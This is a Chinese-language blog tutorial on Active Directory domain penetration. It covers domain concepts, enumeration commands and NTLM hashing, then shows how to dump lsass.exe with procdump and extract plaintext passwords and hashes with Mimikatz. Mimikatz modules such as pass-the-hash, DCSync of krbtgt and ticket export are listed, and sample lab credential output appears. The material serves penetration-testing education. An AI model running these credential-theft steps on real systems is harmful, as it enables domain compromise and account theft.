文章总结: 本文介绍域渗透基础与核心技巧,涵盖域控、活动目录架构及信息收集流程。重点解析WindowsNTLMHash认证原理,演示利用Procdump转储lsass.exe内存,配合Mimikatz提取明文密码与哈希的实战方法。通过环境搭建与命令实例,指导读者掌握从环境识别到凭据窃取的关键步骤,为内网横向移动提供技术支撑。 综合评分: 90 文章分类: 内网渗透,渗透测试,红队,实战经验,安全工具
从零开始学域渗透,基础概念与技巧一网打尽
原创
沐青序 沐青序
数字序言
2026年1月30日 07:30 福建
免责声明:本公众号内容仅供网络安全技术学习与合法研究,严禁用于非法用途。使用者须遵守法律法规,因非法使用造成的全部后果自行承担。本公众号及作者不对内容准确性作保证,不承担因此产生的任何损失。如涉及侵权,烦请告知,核实后将立即处理。感谢理解。
在渗透测试过程中,我们经常会遇到以下场景:某处于域中的服务器通过路由做端口映射,对外提供web服务,我们通过web脚本漏洞获得了该主机的system权限,如果甲方有进一步的内网渗透测试需求,以证明企业所面临的巨大风险,这个时候就需要做内网的域渗透。通常,我们是以获得域控制器的权限为目标,因为一旦域控制器沦陷,整个内网就尽在掌握中了。
一、初识域环境
1、什么是域
将网络中多台计算机逻辑上组织到一起,进行集中管理,这种区别于工作组的逻辑环境叫做域,域是组织与存储资源的核心管理单元,在域中,至少有一台域控制器,域控制器中保存着整个域的用户帐号和安全数据库。
2、域的优点(为什么使用域)
那么域网络结构有什么优点呢?域的优点主要有以下几个方面:
1、权限管理较集中,管理成本降低
域环境中,所有的网络资源,包括用户均是在域控制器上维护的,便于集中管理,所有用户只要登入到域,均能在域内进行身份验证,管理人员可以较好的管理计算机资源,管理网络的成本大大降低;同时在域环境中也可以防止企业员工在域成员主机上违规安装软件,增强客户端安全性,减少客户端故障,降低维护成本。
2、保密性加强
有利于企业的一些保密资料的管理,可以单独对资源进行权限控制,允许或拒绝特定的域账户对资源的请求。
3、安全性加强
使用漫游账户和文件夹重定向,个人账户的工作文件及数据等可以存储在服务器上,进行统一备份及管理,使用户的数据更加安全有保障;同时域控制器能够分发应用程序、系统补丁,用户可以选择安装,也可以由系统管理员指派自动安装,数据及系统安全性大大提高。
4、提高了便捷性
可由管理员指派登陆脚本映射,用户登录后就可以像使用本地盘符一样,使用网络上的资源,且不需要再次输入密码。
基于以上原因,很多企业的内网均会采用域环境,所以作为一名合格的渗透测试人员,域渗透的常规思路和技巧要熟练掌握。
3、域的基本名词解释
1、工作组(work gorup)
在工作组模式的网络中,各服务器都是独立的,而且各服务器中的帐户和资源也是各自进行管理的。所以,管理员需要为每台服务器建立帐户,在管理时也需要分别登录各服务器完成管理工作。授权用户访问不同的服务器时,也需要分别登录。
2、域(Domain)
在域模式的网络中,服务器集中进行管理,域中的帐户和资源也是集中管理的。所以,管理员登录到服务器后就可以管理整个域并可以访问所有共享资源。在域模式的网络中,需要一个对帐户和资源进行统一管理的机制,这个机制就是活动目录(Active Directory)。域中所有的帐户和共享资源都需要在活动目录中进行登记(所以可以在活动目录当中看共享资源),用户可以利用活动目录查找和使用这些资源。基于域模式的网络可大大减轻管理的复杂度和工作量,通常用于结构较复杂的网络。
3、域与工作组的关系
在工作组上你一切的设置在本机上进行包括各种策略,用户登录也是登录在本机的,密码是放在本机的数据库来验证的。而如果你的计算机加入域的话,各种策略是域控制器统一设定,用户名和密码也是放到域控制器去验证,也就是说你的账号密码可以在同一域的任何一台计算机登录。登陆到域中的时候,身份验证是采用Kerberos协议在域控制器上进行的,登陆到此计算机则是通过SAM来进行NTLM验证的。一台电脑要么属于工作组要么属于域,两者对立存在。
4、域控制器(DC)
域控制器(Domain Controller,简写为DC)
是一台安装并运行Active Directory的服务器,它管理用户和域交互之间的所有安全相关方面,集中安全性和管理。一个域可以有一个或多个域控制器,各域控制器间地位平等,管理员可以在任一台域控制器上更新域中的信息,更新的信息会自动传递到网络中的其他域控制器中。(老大-不止一个)
域控的部署 => 略
5、活动目录(AD)
活动目录AD(Active Directory)
域内所有的计算机共享一个集中式的目录数据库(又称为活动目录数据库),它包含着整个域内的对象(用户账户、计算机账户、打印机、共享文件等)和安全信息等等,而活动目录负责目录数据库的添加,修改,更新和删除。所以我们要在Windows Server 2003上实现域环境,其实就是要安装活动目录。活动目录为我们实现了目录服务,提供对企业网络环境的集中式管理。(管理)
6、(域)用户登录
域用户登入
域名\域用户名 : 域用户密码
本地用户登入
计算机名\本地用户名 : 本地用户密码
7、域/域树/域林/林根域
(1)域是一种管理单元,也是一个管理边界在同一个域内共享某些功能和参数;一个域可以有多台域控制器如domain1.com/A.domain1.com/domain2.com分别代表三个独立的域。
(2)域树是指基于在DNS命名空间,如果一个域是另一个域的子域,那么这两个域可以组成一个域树,例如domain1.com/A.domain1.com组成一个域树,domain2.com/A.domain2.com组成—个域树。
(3)域林是指一个或多个不连续DNS名的域(树)的集合;例如上图中的domain1.com/domain2.com/domain3.com组成一个域林。
(4)域林中的第一个被创建的域,称之为林根域。
8、DNS与域的关系
DNS服务器对域来说不可或缺。域中的计算机使用DNS域名,DNS需费为域中的计算机提供域名解服务。
域中的计算机需要利用DNS提供的SRV记录来定位域控制器。
9、DNS对AD域的作用
名称解析:1.DNS将计算机名称转换为IP地址2.计算机使用DNS在网络上相互定位
Windows 2000/2003/2008域的名称:Windows 2000/2003/2008使用DNS命名标准。DNS域和活动自录的域使用共同的名称层析结构。
定位活动目录的物理组件:DNS使用域控制器提供的服务。域中计算机使用DNS来定位域控制器和全局编录。
10、AD域与工作组的区别
管理模式:工作组实现的是分散的管理模式,每一台计算机都是独自自主的;域实现的是主/从管理模式,通过一台域控制器集中管理域内用户帐导和权限。
资源访问:在“域”模式下,资源的访问有较严格的管理,至少有一台服务器负责每一台联入网络的电脑和用户的验证工作。
管理模式:域控制器中包含了由这个域的账户、密码、属于这个域的计算机等信息构成的数据库。工作组只是进行本地电脑的信息与安全的认证。
11、域的信任关系
由于域控制器的作用,域内的用户是不能够跨段进行访问的,如果一定要进行跨段访问,则需要在两个域之间建立信任关系。域与域之间具有一定的信任关系,域信任关系使得一个域中的用户可由另一域中的域控制器进行验证,才能使一个域中的用户访问另一个域中的资源。
域的信任关系—->信任关系域—->被信任关系域
信任关系域的作用:允许一个域内的用户能够访问。
12、组策略
意义:方便管理AD中用户和计算机的工作环境
1.用户桌面环境
2.计算机启动/关机与用户登录/注销时所执行的脚本文件
3.软件分发
4.安全设置
组策略的作用:组策略不适用于早期的Windows操作系统,如Windows 9x/NT,那时使用的是“系统策略”。组策略是系统策略的更高级扩展,它是由Windows 9x/NT的“系统策略”发展而来的,具有更多的管理模板、更灵活的设置对象及更多的功能。
tips:设置Windows域用户帐户密码策略
13、域账号登录成员机的过程
使用域账号进行登录—->成员机检查本地没有这个账号,如果没有则成员机向DNS服务器解析DC的IP—->向DC汇报有人想要进行登录,将账号密码发送给DC—->DC在AD里面找有没有这个账号,有就返回可以登录的指示Access Key,这时候成员机接到Access Key就会让它登录并且在C:\Users里面为a账号创建家目录和配置文件—->登陆成功后成员机会问DC还有什么要求,DC查询AD将组策略发给成员机—->成员机按照组策略来加载一些特定要求,例如:强制成员机有特定桌面壁纸,不能更改等。
14、域控配置
服务器:
1,安装AD域服务
2.设置静态IP地址,并将DNS指向域控
3.添加域内用户
客户端:
1,设置静态IP地址,并将DNS指向域控
2.把用户加入域
15、信任域
在很多实际情况中,一个又有下面的子公司,所以就造成母公司有一个域,子公司有也有一个单独的域。母公司的域与子公司的域如何联系起来呢?我们可以在它们之间建立一种叫信任( Trust)的关系。如果母公司的帐户想要能够登录到子公司的域中,子公司的域就要对母公司的减建立信任关系。当母公司域的帐户想要登录到子公司域中时,子公司域由于信任母公司的域,所以它会听从从母公司域的域控制器返回的 access key。反过来,由于母公司的域没有建立对子公司的信任,所以如果子公司的帐户想要登录到母公司的域中是不可能的。
16、其他概念
域能实现文件的共享,集中统一,便于管理。
域是windows网络中独立运行的基本单位,域之间相互访问则需要建立信任关系,域有安全边界的作用。
域是共享用户账号,计算机账号和安全策略的计算机集合。
域既是windows网络操作系统的逻辑组织单元,也是Internet的逻辑组织单元,在window操作系统中,域是安全边界。
二、环境配置
在开始之前,需要先配置好⼀个域环境。因为用于教学测试,所以只需一台域控和一台加入域内的主机即可。这里我使用的是 windows server 2012 与 windows 7。通过攻击拿下 windows 7 或者直接操控 windows 7,来模拟被攻陷的主机,从而进行域方面是渗透学习。
windows server 2012 存在Administrator用户(域控超级管理员用户)、Windows7的dada用户(加入管理员组的用户)、Windows7的xiao用户(普通域用户)
# 域控windows server 2012
账号:Administrator
密码:Admin@123
主机网络信息:
IP:192.168.126.10
子网掩码:255.255.255.0
网关:192.168.126.2
首选DNS服务器:192.168.126.10(127.0.0.1)
备用DNS服务器:192.168.126.2
# Windows7-dada
隶属于管理员组
账号:mao.com\dada
密码:dada@123
ip:192.168.126.11(21)
# Windows7-xiao
不属于管理员组(普通用户组)
账号:mao.com\xiao
密码:xiao@123
ip:192.168.126.12
若需要用户账户控制 => 域控 Administrator:Admin@123
三、域内信息收集
所有渗透测试的第⼀步,都是信息收集,域也不例外。
1、确定环境
在域内需要先确定被攻击主机的当前内网环境,如拓扑等信息,可以使用以下命令来快速定位。
route print # 查看路由信息
arp -a # 查看域中所有的设备
ipconfig /all # 判断当前是否在域环境中,看dns后缀和dns服务器
ping "域名" # ping AD
net time /domain # 查看系统时间(判断主域)
whoami # 当前用户
hostname # 当前主机名
echo %USERDOMAIN% # 当前用户所在域
set # 查看环境变量,可能包含域信息
- 在渗透时,拿到的数据记得保存,不要看一眼就没了,也尽量不要重复查看,所有的动作都要求干净利索。
2、域内信息收集
# 域控制器识别
nltest /dclist:<域名> # 枚举域控列表
nltest /dsgetdc:<域名> # 获取某个域控
nslookup # DNS 查询域控记录
net time /domain # 同步时间时可获知域控
# 域用户与组枚举
net user /domain # 枚举所有域用户
net group /domain # 枚举所有域组
net group "Domain Admins" /domain # 查看域管组成员
net localgroup administrators # 本机管理员组成员(可能含域用户)
# Kerberos 相关信息
klist # 查看当前用户 Kerberos 票据
setspn -T <域名> -Q * # 枚举域中所有 SPN(需要权限)
# 共享资源枚举
net view \\<hostname> # 查看共享资源
net view /domain # 枚举域内主机
如果报错6118 =>
1、关闭防火墙(netsh advfirewall set allprofiles state off
);2、开启服务(Computer Browser、Server、Workstation);3、重新打开CMD即可
域控作为域的最⾼权限,⾃然是⾸要的攻击⽬标,可以通过刚才的⼀些已知的命令,来找到域控。
通过 net user /domain 来查看域内的账户;通过 net group "domain controllers" /domain 来查看域控。自身权限可以使⽤ whoami /user 命令快速查看。
四、Windows 安全认证机制
1、Windows本地认证
在开始攻击之前,需要先了解⼀下 windows 的认证机制。
通过操作系统的学习,已知 C:\Windows\System32\config\SAM 是储存主机账号密码的数据库⽂件。
windows 登⼊的过程其实很简单,启动winlogin.exe(是 Windows 登录界面的核心组件),当⽤户输⼊账号密码后,账号密码将会发送到lsass.exe,lsass.exe将会把⽤户输⼊的明⽂,转换为NTLM hash与,SAM⽂件存储的数据做⽐较,⽐较成功即登⼊成功。
Winlogon.exe(接收用户输入): 是Windows操作系统的用户登录程序,负责管理用户的登录和登出过程。它提供了用户输入账号和密码的界面,也称为登录页面或登录屏幕。
Lsass.exe(本地安全授权子系统服务): 是微软windows系统的安全机制,是Windows操作系统中的一个关键进程,负责处理本地安全和登录策略。它在Windows系统启动时自动启动,并一直运行在后台。
2、NTLM hash
当然,windows本身是不会存储明⽂密码的,在SAM⽂件中所存储的是密码的散列值,⽽在登⼊的时候,也是先将⽤户输⼊转换为散列值,才进⾏对⽐的。
Hash一般存储在两个地方:
- 1、SAM文件,存储在本机 => 对应本地用户
- 2、NTDS.DIT文件,存储在域控上 => 对应域用户
1.加密过程
⽤户输⼊的明⽂密码 => ⼗六进制 => unicode => md4 算法 => NTLM hash。可以看⻅,整个加密过程还是较为简单的。
2.存储的密码格式
例:administrator:500:LM hash:NTLM hash
可以看⻅,先是⽤户名,再是该⽤户的 SID,后⾯跟着 LM hash 和 NTLM hash
如果LM Hash 是 AAD3B 开头,则是空密码或者未设置密码。
LM Hash全名为 “LAN Manager Hash”,是微软为了提⾼Windows操作系统的安全性⽽采⽤的散列加密算法,其本质是DES加密。尽管LM Hash较容易被破解,但是为了保证系统的兼容性,Windows只是将LM Hash禁⽤了(从Windows Vista和Windows Server 2008版本开始,Windows操作系统默认禁⽤LM Hash),LM Hash明⽂密码被限制在14位以内,也就是说,如果要停⽌使⽤LM Hash,将⽤户的密码设置为14位以上就好了。
3.lsass.exe
在内⽹渗透进⾏横向移动和权限提升时,最常⽤的⽅法是通过 dump 进程 lsass.exe,从中获得明⽂⼝令或者hash。 lsass.exe(Local Security Authority SubsystemService)是⼀个系统进程,⽤于微软Windows系统的安全机制,它⽤于本地安全和登陆策略。在进程空间中,存有着机器的域、本地⽤户名和密码等重要信息。但是需要⾸先获得⼀个⾼的权限才能对其进⾏访问。
五、从 lsass.exe 获取密码
1、Procdump
procdump是⼀款命令⾏⼯具,主要⽤途是监视应⽤程序的CPU异常动向,并且对内存做⼀个转储。上⾯提到了密码的明⽂与密⽂都存储在lsass⾥,所以使⽤procdump即可将 lsass 的内存资源转储出来。以下是它的⼀些参数。
1.相关参数
- -ma:写⼊“完整”转储⽂件。【包括所有内存 (映像、映射和专⽤);包括 (进程、线程、模块、句柄、地址空间等) 的所有元数据】
- -accepteula:使⽤该命令行选项时,表示⾃动接受Sysinternals许可协议。
2.简单使用
使⽤⽅式⾮常简单,指定参数和要转储内存的⽂件后,再指定保存的⽂件名,即刻获得后缀名为 .dmp 的内存转储⽂件。(需要管理员权限的命令行窗口才可操作)
procdump.exe -ma -accepteula lsass.exe passwd.dmp #把内存当中的HASH导入到本地,并命名为passwd.dmp
正常我们是打不开passwd.dmp这个文件的,要是以记事本打开也都是乱码。这时,我们就要用到另一个小工具Mimikatz进行对passwd.dmp进行读取
2、Mimikatz
Mimikatz 是法国⼈benjamin开发的⼀款功能强⼤的轻量级调试⼯具,本意是⽤来个⼈测试,但由于其功能强⼤,能够直接读取WindowsXP-2012等操作系统的明⽂密码⽽闻名于渗透测试,可以说是渗透必备⼯具。
1.相关参数
因为 mimikatz 参数较多,这⾥只介绍常⽤的参数。
mimikatz # :: 显示帮助指令
mimikatz # cls 清空
mimikatz # log 记录所得到的信息
mimikatz # hostname 查看主机名
- privilege 模块
(需要管理员权限的命令行窗口才可操作)
mimikatz # privilege::debug 提升 mimikatz 权限(通过mimkatz自带的漏洞脚本对当前设备进行攻击)
- sekurlsa 模块
1、提取当前系统中已登录用户的密码(该方法需要先提升mimikatz权限)
mimikatz # sekurlsa::logonpasswords 获取所有账户密码(比procdump的使用更简单)
2、抓取用户NTLM哈希(读取内存的HASH-列出 LM 和 NTML 凭证)
mimikatz # sekurlsa::msv
3、加载dmp文件,并导出其中的明文密码
mimikatz # sekurlsa::minidump passwd.dmp 切换环境
mimikatz # sekurlsa::logonpasswords full 列出所有可用的凭据
4、导出lsass.exe进程中所有的票据
mimikatz # sekurlsa::tickets /export
5、列出 kerberos 凭证
mimikatz # sekurlsa::kerberos 获取kerberos认证信息(账户密码等)-域内
6、pass-the-hash 哈希传递
mimikatz # sekurlsa::pth
- lsadump 模块
mimikatz # lsadump::sam 查看sam文件内容获取用户名和NTLM hash
mimikatz # lsadump::secrets 获取当前用户密码
mimikatz # lsadump::dcsync /user:krbtgt 获取域控上krbtgt⽤户信息
- kerberos 模块
1、列出系统中的票据
mimikatz # kerberos::list 列出票据
mimikatz # kerberos::tgt 列出票据
2、清除系统中的票据
mimikatz # kerberos::purge 清除票据
3、导入票据到系统中
mimikatz # kerberos::ptc 票据路径
- process 模块
mimikatz # process::start command 启动进程
mimikatz # process::stop command 结束进程
mimikatz # process::list 列出进程
Mimikatz 因为效果太好导致会被杀毒警报,若是想在⽬标机器运⾏先考虑是否需要对 Mimikatz 做免杀处理。
2.简单使用
Mimikatz 能够从内存中提取纯⽂本密码,通过参数 sekurlsa::minidump 载⼊刚才procdump 获取的 dmp ⽂件后,就可以使⽤ sekurlsa::logonpasswords full 等命令,对密码进⾏读取。实现效果如下图:
mimikatz.exe
sekurlsa::minidump ./passwd.dmp
sekurlsa::logonpasswords full
在这⾥可以看⻅图中带有管理员信息,若是中真实环境中拿到此信息基本就宣告着结束。
3.进阶使用
①利用procdump导下来的dump文件与mimikatz配合使用获取凭据
mimikatz # log //记录所得到的信息
mimikatz # sekurlsa::minidump passwd.dmp //切换环境(挂载dmp文件)
mimikatz # sekurlsa::logonpasswords //列出所有可用的凭据
②直接利用minikatz获取凭据(需要管理权限)
mimikata # log //记录所得到的信息
mimikatz # privilege::debug //提权(获得mimikatz程序的特殊操作)
mimikatz # sekurlsa::msv //提取内存的HASH值
mimikatz # sekurlsa::logonpasswords //列出所有可用的凭据
六、收集情报
User Name : Administrator
Domain : MAO
Logon Server : AD
SID : S-1-5-21-863777703-696496247-1862912240-500
* LM : 6f08d7b306b1dad4b75e0c8d76954a50
* NTLM : 570a9a65db8fba761c1008a51d4c95ab
* SHA1 : 759e689a07a84246d0b202a80f5fd9e335ca5392
* Password : Admin@1233
User Name : xiao
Domain : MAO
SID : S-1-5-21-863777703-696496247-1862912240-1603
* LM : 19de5e66e9ae44661aa818381e4e281b
* NTLM : f8660bf1d9497b89fe7e7a25c69604c7
* SHA1 : 7ae45091aacf4260a40d818c4d46a5ae837b4cef
* Password : xiao@123
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:数字序言 沐青序 沐青序《从零开始学域渗透,基础概念与技巧一网打尽》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论